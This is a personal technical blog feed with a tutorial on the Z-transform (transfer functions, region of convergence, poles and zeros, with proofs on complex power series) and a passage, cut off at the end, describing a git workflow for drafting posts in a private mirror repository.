Jekyll2021-09-18T19:26:07+00:00https://www.kuniga.me/feed.xmlNP-IncompletenessKunigami's Technical BlogGuilherme KunigamiZ-Transform2021-09-10T00:00:00+00:002021-09-10T00:00:00+00:00https://www.kuniga.me/blog/2021/09/10/z-transform<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll learn about the Z-transform. This is the continuation of the study of <a href="(https://www.kuniga.me/blog/2021/08/31/discrete-time-filters.html)">Discrete Filters</a>, so it’s highly recommended to check that post first.</p> <!--more--> <h2 id="constant-coefficient-difference-equations">Constant-Coefficient Difference Equations</h2> <p>A more general form of a discrete filter is</p> $\sum_{k = -\infty}^{\infty} a_k y_{t-k} = \sum_{k = -\infty}^{\infty} b_k x_{t-k}$ <p>In Discrete Filters, we had $a_0 = 1$ and the rest of $a$’s equal to $0$, leading to:</p> $y_{t} = \sum_{k = -\infty}^{\infty} b_k x_{t-k}$ <p>And if we say $\vec{b}$ is the impulse response $\vec{h}$, we get the definition of convolution $\vec{y} = \vec{x} * \vec{h}$.</p> <p>Now suppose only $a_0 = 1$, but we assume nothing of the rest, so we have:</p> $(1) \qquad y_{t} = \sum_{k = -\infty}^{\infty} b_k x_{t-k} - \sum_{k = -\infty, k \ne 0}^{\infty} a_k y_{t-k}$ <p>Which we can interpret as the current output depending on previous ones. This is known as a <em>Constant-Coefficient Difference Equation</em> or <strong>CCDE</strong>.</p> <h2 id="z-transform">Z-Transform</h2> <p>The Z-transform is a function of a vector $\vec{x}$ and a complex variable $z \in \mathbb{C}$ and defined as:</p> $(2) \qquad \mathscr{Z}(\vec{x}, z) = \sum_{t = -\infty}^{\infty} x_t z^{-t}$ <p>If we set $z = e^{i \omega}$ for $0 \le \omega \le 2 \pi$ we get the <a href="https://www.kuniga.me/blog/2021/07/31/discrete-fourier-transform.html">Discrete-Time Fourier Transform</a>, so we can think of the Z-transform as an abstraction.</p> <p>According to , Z-transform doesn’t have a physical interpretation like the DTFT does, but it’s useful as a mathematical tool.</p> <h3 id="properties">Properties</h3> <p><strong>Linearity.</strong> Given vectors $\vec{x}, \vec{y}$ and scalars $\alpha, \beta$, the Z-transform satisfies:</p> $\mathscr{Z}(\alpha \vec{x} + \beta \vec{y}, z) = \alpha \mathscr{Z}(\vec{x}, z) + \beta \mathscr{Z}(\vec{y}, z)$ <p><strong>Time-shift.</strong> Let $\vec{x}$ be a vector and $\vec{x}’$ another vector corresponding to the entries in $\vec{x}$ shifted by $N$ positions, that is, $x’_t = x_{t-N}$. Then the Z-transform satisfies:</p> $\mathscr{Z}(\vec{x}', z) = z^{-N} \mathscr{Z}(\vec{x}, z)$ <p>It follows that</p> $(3) \qquad z^{-N} \mathscr{Z}(\vec{x}, z) = \sum_{t = -\infty}^{\infty} x_{t - N} z^{-t}$ <h3 id="z-transform-on-ccdes">Z-Transform on CCDEs</h3> <p>What happens if we apply the Z-transform to (1)? Let’s define $Y(z) = \mathscr{Z}(\vec{y}, z)$ and $X(z) = \mathscr{Z}(\vec{x}, z)$ to simplify the notation.</p> <p>We have</p> $Y(z) = \sum_{t = -\infty}^{\infty} y_t z^{-t}$ <p>Replacing $y_t$ from (1):</p> $Y(z) = \sum_{t = -\infty}^{\infty} \left(\sum_{k = -\infty}^{\infty} b_k x_{t-k} - \sum_{k = -\infty, k \ne 0}^{\infty} a_k y_{t-k}\right) z^{-t}$ <p>We can re-arrange the sums to obtain:</p> $Y(z) = \left(\sum_{k = -\infty}^{\infty} b_k \sum_{t = -\infty}^{\infty} x_{t-k} z^{-t} \right) - \left(\sum_{k = -\infty, k \ne 0}^{\infty} a_k \sum_{t = -\infty}^{\infty} y_{t-k} z^{-t} \right)$ <p>We note from (3) that the inner sums are $X(z) z^{-k}$ and $Y(z) z^{-k}$ respectively:</p> $Y(z) = \sum_{k = -\infty}^{\infty} b_k X(z) z^{-k} - \sum_{k = -\infty, k \ne 0}^{\infty} a_k Y(z) z^{-k}$ <p>We can re-arrange to isolate $Y(z)$ and get:</p> $Y(z) = \frac{\sum_{k = -\infty}^{\infty} b_k X(z) z^{-k}}{1 + \sum_{k = -\infty, k \ne 0}^{\infty} a_k z^{-k}}$ <p>Since $X(z)$ is independent of $k$:</p> $Y(z) = \frac{\sum_{k = -\infty}^{\infty} b_k z^{-k}}{1 + \sum_{k = -\infty, k \ne 0}^{\infty} a_k z^{-k}} X(z)$ <p>We define the first multiplier as $H(z)$, known as the <strong>transfer function</strong> of the filter described by the CCDE:</p> $Y(z) = H(z) X(z)$ <p>The transfer function is the Z-transform of the impulse response of the filter. To see why, recall that to obtain the impulse response of a system we set $\vec{x} = \vec{\delta}$ when computing $\vec{y}$. It’s easy to see that $X(z) = \mathscr{Z}(\vec{\delta}, z) = 1$, so $Y(z) = H(z)$.</p> <p>It’s thus no coincidence the choice of $H$ to denote the transfer function, since it is closely related to the impulse response $h$.</p> <h2 id="convergence">Convergence</h2> <h3 id="region-of-convergence">Region of Convergence</h3> <p>Recall that $z$ is a complex variable, so we can “visualize” its domain as the 2D plane (complex plane). The set of values of $z$ such that the sum in (2) converges absolutely is defined as the <strong>region of convergence</strong>, or $ROC\curly{\mathscr{Z}(\vec{x}, z) }$.</p> <p>We can split (2) into 2, so that both start from index 0 and define a series in the form we usually define convergence over:</p> $\mathscr{Z}(\vec{x}, z) = \sum_{t = -\infty}^{-1} x_t z^{-t} + \sum_{t = 0}^{\infty} x_t z^{-t} = \sum_{t = 1}^{\infty} x_t z^{t} + \sum_{t = 0}^{\infty} x_t \frac{1}{z}^{t}$ <p>For $\mathscr{Z}(\vec{x}, z)$ to exist, both the sums must converge. Each of them define a complex power series, that is a series of the form $\sum_{k = 0}^{\infty} c_k z^k$.</p> <p>It’s possible to show (see <em>Appendix</em>) that given a complex power series there is $0 \le R \le \infty$ such that it converges absolutely for $\abs{z} \le R$ (<em>absolutely</em> if $\abs{z} &lt; R$) and diverges for $\abs{z} &gt; R$.</p> <p>We can thus find $R$ for each of the complex power series, say $R_1, R_2$ and define the region of convergence for $\abs{z} &lt; \min(R_1, R_2)$.</p> <p>Note that region of convergence of $\abs{z}$ defines a circle when visualized in the complex plane.</p> <h3 id="convergence-and-stability">Convergence and Stability</h3> <p>In Discrete Filters [link], we showed that for a system is bounded-input bounded-output (BIBO) if, and only if, its impulse response $\vec{h}$ to be absolutely summable.</p> <p>Recall that the transfer function is the Z-transform of the impulse response of the filter:</p> $H(z) = \mathscr{Z}(\vec{h}, z) = \sum_{t = -\infty}^{\infty} h_t z^{-t}$ <p>If $H(z)$ is absolute convergent for $\abs{z} = 1$, then $\sum_{t = -\infty}^{\infty} \abs{h_t z^{-t}}$ converges, and since $\abs{a b} = \abs{a} \abs{b}$ , then $\sum_{t = -\infty}^{\infty} \abs{h_t} \abs{z^{-t}} = \sum_{t = -\infty}^{\infty} \abs{h_t}$ also converges.</p> <p>We conclude that a system is BIBO if its ROC contains $\abs{z} = 1$.</p> <h2 id="poles-and-zeros">Poles and Zeros</h2> <h3 id="realizable-filters">Realizable Filters</h3> <p>A filter is <strong>realizable</strong> if we can implement it via some finite algorithm, which means that $y_t$ in (1) can only depend on a finite number of terms and is causal (i.e. only depends on past terms):</p> $y_{t} = \sum_{k = 0}^{M-1} b_k x_{t-k} - \sum_{k = 1}^{N-1} a_k y_{t-k}$ <p>The transfer function for realizable filters is the ratio of finite-degree polynomials, in which case it’s also called <strong>rational transfer function</strong>:</p> $H(z) = \frac{\sum_{k = 0}^{M-1} b_k z^{-k}}{1 + \sum_{k = 1}^{N-1} a_k z^{-k}}$ <h3 id="poles-of-the-transfer-function">Poles of the Transfer Function</h3> <p>Since the Z-transform for realizable filters is finite, they’re convergent. However, for the transfer function to exist, we must have the denominator of $H(z)$ to be non-zero.</p> <p>We thus need to find the values of $z$ for which this polynomial is zero:</p> $1 + a_1 z^{-1} + a_2 z^{-2} + \cdots + a_{N-1} z^{-(N-1)}$ <p>In other words, we want to find the roots of this polynomial, say $p_0, \cdots, p_{N-1}$, which in this context is known as the <strong>poles</strong> of the transfer function. The ROC cannot contain any poles.</p> <p>Let $p^*$ be the pole with hightest magnitude. Thus if $\abs{z} &gt; \abs{p^{*}}$ we’re guaranteed to avoid zeros in the denominator.</p> <p>Moreover, if $\abs{p^*} \le 1$, there’s a region defined by $\abs{p^*} &lt; \abs{z} \le 1$ where the system is convergent and BIBO.</p> <h3 id="zeros-of-the-transfer-function">Zeros of the Transfer Function</h3> <p>We can similarly find the root of the polynomial in the numerator of $H(z)$, say $z_0, \cdots, z_{M-1}$. We can then express the transfer function as a product of terms.</p> <p>For each root $r$, we can add a factor $(z - r)$ or to keep it in terms of $z^{-1}$, $(1 - r z^{-1})$, noting both evaluate to 0 when $z = r$.</p> $(4) \qquad H(z) = b_0 \frac{\prod_{k = 0}^{M-1} (1 - z_n z^{-1})}{\prod_{k = 0}^{N-1} (1 - p_n z^{-1})}$ <p>We assume the denominator and numerator are co-prime so they can’t be called out.</p> <h3 id="the-pole-zero-plot">The Pole-Zero Plot</h3> <p>We can visualize the zeros and poles in the complex plane for $z$. The convention is to display poles as crosses (X) and zeros as dots (O).</p> <p>We also overlay the unit circle because inside the unit circle the system is BIBO. We can use this plot to quickly detect if any poles lie outside of the unit cirtcle. Figure 1 has two example filters.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-09-10-z-transform/zero-pole-plot.png" alt="See caption" /> <figcaption>Figure 1: Examples of Pole-Zero Plots. Screenshot from </figcaption> </figure> <p>If we’re to plot $\abs{H(z)}$ (z-axis) over $z$ (xy-plane) we’d have a 3D plot where for zeros, $\abs{H(z)} = 0$ and for poles $\abs{H(z)} = \infty$, visually the poles would look like, guess what… poles, hence the name.</p> <h3 id="filtering-poles-out">Filtering Poles Out</h3> <p>When we apply a filter after another, we can get the resulting impulse response via convolution as we briefly mention in <a href="(https://www.kuniga.me/blog/2021/08/31/discrete-time-filters.html)">Discrete Filters</a>.</p> <p>If the impulse responses are absolute summable, we can apply the convolution theorem also described previously  (we proved it for DTFT but can be easily generalized for the Z-transform).</p> <p>Using the convolution theorem, we have that if the impulse response of 2 filters is the convolution $\vec{h_1} * \vec{h_2}$, the combined transfer function is the product of their Z-transform $\mathscr{Z}(\vec{h_1}, z) \mathscr{Z}(\vec{h_2}, z)$.</p> <p>Looking at the definition of (4), we can combine filters to remove poles from another. For example, suppose $\mathscr{Z}(\vec{h_1}, z)$ has a pole $\abs{p_i} &gt; 1$ we want to remove. We can configure the second filter so that the <em>numerator</em> in $\mathscr{Z}(\vec{h_2}, z)$ contains a factor $(1 - z_j z^{-1})$ (with $z_j = p_i$) that can cancel out the factor $(1 - p_i z^{-1})$ in the denominator of $\mathscr{Z}(\vec{h_1}, z)$!</p> <h2 id="examples">Examples</h2> <h3 id="moving-average">Moving Average</h3> <p>Recall from  that the moving average filter is:</p> $y_t = \mathscr{H}(\vec{x}, t) = \frac{1}{N} \sum_{k = 0}^{N - 1} x_{t - k}$ <p>So we have:</p> $H(z) = \frac{1}{N} \sum_{t = 0}^{N-1} z^{-t}$ <p>Which is a geometric series with closed form:</p> $H(z) = \frac{1}{N} \frac{1 - z^{-N}}{1 - z^{-1}}$ <p>In Figure 2 we plot $\abs{H(z)}$ (z-axis) over $z$ (xy-plane). When $\abs{z} \rightarrow 0$, then $\abs{z^{-N}} \rightarrow \infty$ so we have to crop the chart for low values of $\abs{z}$.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-09-10-z-transform/abs_xfer_func.png" alt="3D surface plot showing that as we approach the xy-origin, H(z) goes to infity" /> <figcaption>Figure 2: plot of |H(z)| for the moving average with N = 8</figcaption> </figure> <p>Let’s define $z’ = 1/z$. The roots of the numerator are the $z’$ which raised to $N$ yield 1. They’re known as <a href="https://en.wikipedia.org/wiki/Root_of_unity">root of unit</a> and are of the form: $z’ = e^{(2 k \pi i)/N}$ for $k = 0, \cdots, N-1$.</p> <p>In other words, when $z = e^{(-2 k \pi i)/N}$ for $k = 0, \cdots, N-1$, then $H(z) = 0$. Further, when $k = 0$, $z = 1$ and it cancels out the denominator. We can then write $H(z)$ as a product of roots:</p> $H(z) = \frac{1}{N} \prod_{k = 1}^{N} (1 - e^{(-2 k \pi i)/N} z^{-1})$ <p>This means the moving average filter does not have poles, but this is curious because for $z = 0$ the $\abs{H(z)}$ tends to infinity, so in that sense it does look like a pole, but it’s not a pole according to the definition.</p> <p>If we plot the zeros on the complex plane, we’ll have $N$ dots evenly spread out on the unit circle.</p> <h3 id="leaky-integrator">Leaky Integrator</h3> <p>Recall from  that the leaky integrator filter is:</p> $y_t = \lambda y_{t - 1} + (1 - \lambda) x_t$ <p>With $b_0 = (1 - \lambda)$ and $a_1 = -\lambda$ and all the other coefficients 0, so we have:</p> $H(z) = \frac{1 - \lambda}{1 - \lambda z^{-1}}$ <p>The pole is when $z = \lambda$, so we achieve convergence when $\abs{z} &gt; \lambda$. Finally the the system is stable if $\lambda &lt; 1$.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-09-10-z-transform/zero-pole-examples.png" alt="See caption" /> <figcaption>Figure 3: Pole-Zero Plots for moving average and leaky integrator, respectively. Screenshot from </figcaption> </figure> <h2 id="conclusion">Conclusion</h2> <p>The main reason I picked up the book from Prandoni and Vetterli  was to learn about the Z-transform. I was trying to learn about some other DSP topic and a lot of the ideas were over my head, and I realized I needed a better foundation. The region of convergence of the transfer function was one of the things I couldn’t get, but I now have a much better grasp of it.</p> <p>While studying this topic, I had some very vague recollections of having seen something similar to region of convergence in the unit circle during my undergraduate years. I looked up the curriculum and found <a href="https://www.fee.unicamp.br/node/917">EE400</a>, which does mention complex numbers and power series, but not the Z-transform.</p> <p>It’s likely it was the Laplace transform I learned about, which is the continuous version of the Z-transform . Analogously, CCDEs are the discrete counterpart to differential equations. Despite the name, I didn’t make the connection, and I’d like to learn more about their similarities at some point.</p> <p>The book  mentions in passing that when a complex power series converges it converges absolutely. Maybe it’s a well known result but it was pretty tricky for me to see why that’s the case and I had to go over several steps in the <em>Appendix</em> to convince myself.</p> <p>This was the first time I used matplotlib’s 3D plot and it’s possibly the first time I plot a 3D chart.</p> <h2 id="related-posts">Related Posts</h2> <p><a href="https://www.kuniga.me/blog/2021/07/31/lpc-in-python.html">Linear Predictive Coding in Python</a> - While looking into translating the Matlab code into Python, I had to look up the definition of <a href="https://docs.scipy.org/doc/scipy/reference/generated/scipy.signal.lfilter.html">lfilter</a>, which I couldn’t understand at the time.</p> <p>The docs describe a filter in terms of the coefficients $a$ and $b$ in the CCDE form (which they call <em>direct II transposed structure</em>). It also mentions the rational transfer function! Everything makes much more sense now.</p> <p>So when we have:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">b</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">concatenate</span><span class="p">([</span><span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">([</span><span class="o">-</span><span class="mi">1</span><span class="p">]),</span> <span class="n">a</span><span class="p">])</span> <span class="n">x_hat</span> <span class="o">=</span> <span class="n">lfilter</span><span class="p">([</span><span class="mi">1</span><span class="p">],</span> <span class="n">b</span><span class="p">.</span><span class="n">T</span><span class="p">,</span> <span class="n">src</span><span class="p">.</span><span class="n">T</span><span class="p">).</span><span class="n">T</span></code></pre></figure> <p>We’re basically describing a filter:</p> $y_t = -x_{t} + \sum_{i = 1}^{n} a_i x_{t - i}$ <p>Where $\vec{x}$ is <code class="language-plaintext highlighter-rouge">src</code> and $\vec{y}$ is <code class="language-plaintext highlighter-rouge">x_hat</code>.</p> <h2 id="appendix">Appendix</h2> <p>It’s worth recalling that a complex series</p> $\sum_{k = 0}^{\infty} c_k, \quad \mbox{where } c_k = a_k + i b_k \in \mathbb{C}$ <p>converges if both its real and imaginary series:</p> $\sum_{k = 0}^{\infty} a_k \qquad \mbox{and} \qquad \sum_{k = 0}^{\infty} b_k$ <p>converge. A complex series converges <strong>absolutely</strong> if the following real series converges:</p> $\sum_{k = 0}^{\infty} \abs{c_k}, \qquad \abs{c_k} = \sqrt{a_n^2 + b_n^2}$ <p>Let’s consider some lemmas.</p> <p><strong>Lemma 1.</strong> If a real series $\sum_{n = 0}^{\infty} a_n$ converges, then $\lim_{n \rightarrow \infty} \abs{a_k} = 0$.</p> <p><em>Proof.</em> Consider the partial sum $S_n = \sum_{k = 0}^{n} a_k$. By definition, $\sum_{k = 0}^{\infty} a_k$ is convergent if $\lim_{n \rightarrow \infty} S_n = L$ for some real $L$ and so $\lim_{n \rightarrow \infty} S_{n+1} = L$. We have that $a_{n + 1} = S_{n+1} - S_{n}$, so $\lim_{n \rightarrow \infty} a_{n + 1} = L - L = 0$. <em>QED</em></p> <p><strong>Lemma 2.</strong> If a complex series converges, then $\lim_{n \rightarrow \infty} \abs{c_n} = 0$.</p> <p><em>Proof.</em> By definition $\sum_{n = 0}^{\infty} a_n$ and $\sum_{n = 0}^{\infty} b_n$ converge, so by <em>Lemma 1</em>, $\lim_{n \rightarrow \infty} \abs{a_n} = 0$ and $\lim_{n \rightarrow \infty} \abs{b_n} = 0$, thus $\lim_{n \rightarrow \infty} c_n = \sqrt{\abs{a_n}^2 + \abs{b_n}^2} = 0$. <em>QED</em></p> <p>Consider the following complex power series:</p> <p><strong>Lemma 3.</strong> Consider the complex power series $\sum_{n = 0}^{\infty} z^n$. If $\abs{z} &lt; 1$ then it converges <em>absolutely</em>, and if $\abs{z} \ge 1$, it diverges.</p> <p><em>Proof.</em> If $\abs{z} &lt; 1$, then $\sum_{n = 0}^{\infty} \abs{z}^n$ is a geometric series, which has a closed form given by</p> $\frac{1 - \abs{z}^{n + 1}}{1 - \abs{z}}$ <p>Because $\lim_{n \rightarrow \infty} \abs{z}^{n + 1} = 0$, the geometric series converges to $1 / (1 - \abs{z})$. Since $\abs{z}^n = \abs{z^n}$, it follows that $\sum_{n = 0}^{\infty} \abs{z^n}$ is convergent.</p> <p>Conversely, if $\abs{z} \ge 1$, then $\abs{z^n} \ge 1 \ne 0$, so $\sum_{n = 0}^{\infty} \abs{z^n}$ must diverge otherwise it would contradict <em>Lemma 2</em>. <em>QED</em></p> <p><strong>Lemma 4.</strong> If $\sum_{n = 0}^{\infty} a_n$ converges, then $\abs{a_n} \le M$ for all $n$.</p> <p><em>Proof.</em> By definition, given an arbritary $\epsilon &gt; 0$, there exists $L$ and $N$ such that $\abs{S_n - L} &lt; \epsilon$ for $n \ge N$. Then $\abs{S_{n+1} - L} &lt; \epsilon$, and we claim that $\abs{a_{n+1}} &lt; 2 \epsilon$ because otherwise adding $a_{n+1}$ to $S_n$ would violate the constraint for $S_{n+1}$.</p> <p>Now, since $N$ is finite, the upper bound $M = \max(\abs{a_n})$ for $n \le N$ is defined. It’s easy to see that $\abs{a_n} \le \max(M, 2\epsilon)$ for all $n$. <em>QED</em></p> <p>Consider the following complex power series:</p> $(5) \quad \sum_{k = 0}^{\infty} c_k z^k, \qquad c_k, z \in \mathbb{C}$ <p><strong>Lemma 5.</strong> Suppose (5) converges for $z = w_0 \ne 0$. Show that if $\abs{w} &lt; \abs{w_0}$, then (5) converges <em>absolutely</em> for $z = w$.</p> <p><em>Proof.</em> We can write $\abs{c_n w^n}$ as:</p> $\abs{c_n w^n} = \abs{c_n w_0^n \frac{w^n}{w_0^n}} = \abs{c_n w_0^n} \abs{\frac{w^n}{w_0^n}} = \abs{c_n w_0^n} \abs{\frac{w}{w_0}}^n$ <p>Since (5) is convergent, by <em>Lemma 4</em>, there exists $M$ such that $\abs{c_n w_0^n} &lt; M$, so,</p> $\abs{c_n w^n} &lt; M \abs{\frac{w}{w_0}}^n$ <p>Since $\abs{w} &lt; \abs{w_0}$, $\abs{\frac{w}{w_0}} &lt; 1$ and we can use <em>Lemma 3</em> to show that the sum of its absolute terms $\sum_{n = 0}^{\infty} \abs{\frac{w}{w_0}}^n$ converges, so</p> $\sum_{n = 0}^{\infty} \abs{c_n w^n} &lt; \sum_{n = 0}^{\infty} M \abs{\frac{w}{w_0}}^n = M \sum_{n = 0}^{\infty} \abs{\frac{w}{w_0}}^n$ <p>also converges and we conclude that $\sum_{n = 0}^{\infty} c_n z^n$ is absolutely convergent for $z = w$. <em>QED</em></p> <p><strong>Corollary 6.</strong> A consequence of <em>Lemma 5</em> is that there exists some value $R$ such that (5) converges at $\abs{z} = R$, diverges at $\abs{z} &gt; R$ and converges absolutely at $\abs{z} &lt; R$.</p> <p><strong>Corollary 7.</strong> Given the power series (5), we have three possibilities regarding convergence:</p> <ul> <li>It only converges for $\abs{z} = 0$ and diverges for $\abs{z} &gt; 0$</li> <li>It converges for any $z$</li> <li>It converges for some $\abs{z} = R$, diverges at $\abs{z} &gt; R$ and converges absolutely at $\abs{z} &lt; R$ (<em>Corollary 6</em>).</li> </ul> <p>The third case can be seen as a more general version of the first two. The first one happens if $R = 0$, the second when $R = \infty$.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://www.amazon.com/gp/product/B01FEKRY4A/">1</a>] Signal Processing for Communications, Prandoni and Vetterli</li> <li>[<a href="https://faculty.math.illinois.edu/~clein/honors7solf11.pdf">2</a>] Honors Problem 7: Complex Series</li> <li>[<a href="https://en.wikipedia.org/wiki/Absolute_value_(algebra)">3</a>] Absolute value (algebra)</li> <li>[<a href="(https://www.kuniga.me/blog/2021/08/31/discrete-time-filters.html)">4</a>] NP-Incompleteness: Discrete Filters</li> <li>[<a href="https://www.quora.com/What-is-the-difference-between-Laplace-and-Fourier-and-z-transforms">5</a>] Quora: What is the difference between Laplace and Fourier and z transforms?</li> </ul> <p>The 3D chart was generated using Matplotlib, the source code available as a <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-09-10-z-transform/charts.ipynb">Jupyter notebook</a>.</p>Guilherme KunigamiIn this post we’ll learn about the Z-transform. This is the continuation of the study of Discrete Filters, so it’s highly recommended to check that post first.Writing Posts2021-09-01T00:00:00+00:002021-09-01T00:00:00+00:00https://www.kuniga.me/blog/2021/09/01/writing-posts<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>This is a meta post to describe my flow for writing posts. When I <a href="https://www.kuniga.me/blog/2020/07/11/from-wordpress-to-jekyll.html">moved to static Github pages</a> over a year ago, I didn’t have a flow that I was satisfied with but I’ve recently settled in one which I think is worth documenting.</p> <!--more--> <p>It’s worth recalling that in static Github pages I write in markdown and manage them using git (and Github).</p> <p>The overall idea is to be able to write a post in draft mode, which is hidden from view and only when it’s ready I merge it on master, which is automatically picked up by Github pages and made public.</p> <h2 id="early-drafts">Early drafts</h2> <p>I usually have a bunch of topics I’d like to write about at one time, so I keep these early stage drafts as Google docs, which are mostly a collection of links and some comments.</p> <p>Once I have enough confidence on it becoming a future post, I move to markdown.</p> <h2 id="private-branch">Private Branch</h2> <p>In the past I’d keep an un-committed markdown files plus images for the posts, occasionally backing them up by copying them to Dropbox.</p> <p>Needless to say it’s a subpar flow. I was really looking for a way to use git to backup my changes but didn’t want them to show up in my repository while in development.</p> <p>I started looking for private branches but they don’t exist. An alternative was proposed in this Stack Overflow answer . The idea is to keep a private mirror of the main repo and commit only to the private one, occasionally syncing with the public.</p> <p>Suppose the name of our main blog repository is <code class="language-plaintext highlighter-rouge">blog</code>.</p> <h3 id="create-a-new-private-repo">Create a new private repo</h3> <p>Github supports creating <a href="https://github.blog/2019-01-07-new-year-new-github/">private repositories for free</a>. Let’s call it <code class="language-plaintext highlighter-rouge">draft-blog</code>.</p> <h3 id="create-a-mirror-repo">Create a mirror repo</h3> <p>Here we copy the steps from the <a href="https://docs.github.com/en/github/creating-cloning-and-archiving-repositories/creating-a-repository-on-github/duplicating-a-repository">Github docs</a> .</p> <p>Create a bare clone of the repository:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$</span>git clone <span class="nt">--bare</span> https://github.com/exampleuser/blog.git</code></pre></figure> <p>Mirror-push to the new repository:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">cd </span>blog <span class="nv">$ </span>git push <span class="nt">--mirror</span> https://github.com/exampleuser/draft-blog.git</code></pre></figure> <p>Remove the temporary local repository you created earlier.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$</span><span class="nb">cd</span> .. <span class="nv">$ </span><span class="nb">rm</span> <span class="nt">-rf</span> blog</code></pre></figure> <h3 id="clone-the-new-repo-locally">Clone the new repo locally</h3> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$</span>git clone git@github.com:exampleuser/draft-blog.git</code></pre></figure> <h3 id="add-remotes">Add remotes</h3> <p>A git remote is basically an alias for the URL of the remote repo. When we use <code class="language-plaintext highlighter-rouge">git clone</code>, it adds a default alias called <code class="language-plaintext highlighter-rouge">origin</code>, which points to the original repo. We can inspect via <code class="language-plaintext highlighter-rouge">git remote -v</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">origin git@github.com:exampleuser/draft-blog.git <span class="o">(</span>fetch<span class="o">)</span> origin git@github.com:exampleuser/draft-blog.git <span class="o">(</span>push<span class="o">)</span></code></pre></figure> <p>Note we have one entry for read (fetch) and one for write (push).</p> <p>We want to add another remote that points to the public blog, that is <code class="language-plaintext highlighter-rouge">git@github.com:exampleuser/blog.git</code>, and name it <code class="language-plaintext highlighter-rouge">public</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>git remote add public git@github.com:exampleuser/blog.git</code></pre></figure> <p>If we type <code class="language-plaintext highlighter-rouge">git remote -v</code> we should see 4 entries now:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">origin git@github.com:exampleuser/draft-blog.git <span class="o">(</span>fetch<span class="o">)</span> origin git@github.com:exampleuser/draft-blog.git <span class="o">(</span>push<span class="o">)</span> public git@github.com:exampleuser/blog.git <span class="o">(</span>fetch<span class="o">)</span> public git@github.com:exampleuser/blog.git <span class="o">(</span>push<span class="o">)</span></code></pre></figure> <h2 id="writing">Writing</h2> <p>Before we start writing, we create a branch. For this very post I created one called <code class="language-plaintext highlighter-rouge">post-writing</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git branch post-writing git checkout post-writing</code></pre></figure> <p><strong>NOTE:</strong> It’s important we create branches off the <code class="language-plaintext highlighter-rouge">master</code> branch (we’ll see why later), so always do <code class="language-plaintext highlighter-rouge">git checkout master</code> before creating a new branch.</p> <p>I usually write a bit every other way. When I’m done, I simply create a dummy commit and sync to a similarly named branch in the private repo for backup:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git commit <span class="nt">-am</span> <span class="s2">"backup"</span> git push origin post-writing</code></pre></figure> <p>Since I always push to a branch to the same name on remote, I set the <code class="language-plaintext highlighter-rouge">push</code> behavior to <code class="language-plaintext highlighter-rouge">current</code>, which pushes the current branch to a branch of the same name in the remote :</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git config push.default current</code></pre></figure> <p>So we can simply do:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git commit <span class="nt">-am</span> <span class="s2">"backup"</span> git push origin</code></pre></figure> <h2 id="merging">Merging</h2> <p>Once the post is ready for publishing, we want to merge into the master, but we don’t want all those dummy backup commits polluting the logs.</p> <p>This <a href="https://stackoverflow.com/questions/25356810/git-how-to-squash-all-commits-on-branch">Stack Overflow answer</a>  provides a way to squash all the commits from a branch into a single one:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git checkout post-writing git reset <span class="si">$(</span>git merge-base master <span class="si">$(</span>git branch <span class="nt">--show-current</span><span class="si">))</span> git add <span class="nt">-A</span> git commit <span class="nt">-m</span> <span class="s2">"new post: writing posts"</span></code></pre></figure> <p>Let’s analyze the second command:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git branch <span class="nt">--show-current</span></code></pre></figure> <p>Simply returns the current branch name <code class="language-plaintext highlighter-rouge">post-writing</code>. Wrapped in <code class="language-plaintext highlighter-rouge">$()</code> means it’s treated as a variable, thus</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git merge-base master <span class="si">$(</span>git branch <span class="nt">--show-current</span><span class="si">)</span></code></pre></figure> <p>is really</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git merge-base master post-writing</code></pre></figure> <p>The command above returns the <code class="language-plaintext highlighter-rouge">&lt;hash&gt;</code> of the commit that is the lowest common ancestor to both <code class="language-plaintext highlighter-rouge">master</code> and <code class="language-plaintext highlighter-rouge">post-writing</code>. Finally we do</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git reset &lt;<span class="nb">hash</span><span class="o">&gt;</span></code></pre></figure> <p>This will set the current index back to that ancestor commit and the changes from <code class="language-plaintext highlighter-rouge">post-writing</code> relative to that ancestor will show up as un-committed changes.</p> <p>This command assumes <code class="language-plaintext highlighter-rouge">post-writing</code> was created off the <code class="language-plaintext highlighter-rouge">master</code>. It it was created off some other branch <code class="language-plaintext highlighter-rouge">foo</code>, reseting the index would include changes from <code class="language-plaintext highlighter-rouge">foo</code> as well. Hence the note in the <em>Writing</em> section.</p> <p>To simplify things, we can alias the second command as <code class="language-plaintext highlighter-rouge">compress</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git config alias.compress <span class="s2">"! git reset </span><span class="si">$(</span>git merge-base master <span class="si">$(</span>git branch <span class="nt">--show-current</span><span class="si">))</span><span class="s2">"</span></code></pre></figure> <p>Now we can merge it into master:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git checkout master git merge post-writing</code></pre></figure> <h2 id="syncing">Syncing</h2> <p>Finally we can make the post public by pushing it to the public remote:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git push public</code></pre></figure> <h2 